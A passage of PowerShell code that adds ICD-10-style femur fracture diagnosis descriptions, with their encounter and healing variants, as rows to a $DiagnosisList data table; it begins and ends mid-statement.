$DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of left femur","Nondisplaced articular fracture of head of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced articular fracture of head of unspecified femur","Nondisplaced articular fracture of head of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of right femur","Other fracture of head and neck of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of left femur","Other fracture of head and neck of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of head and neck of unspecified femur","Other fracture of head and neck of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of right femur","Unspecified trochanteric fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of left femur","Unspecified trochanteric fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified trochanteric fracture of unspecified femur","Unspecified trochanteric fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of right femur","Displaced fracture of greater trochanter of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of left femur","Displaced fracture of greater trochanter of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of greater trochanter of unspecified femur","Displaced fracture of greater trochanter of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of right femur","Nondisplaced fracture of greater trochanter of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced 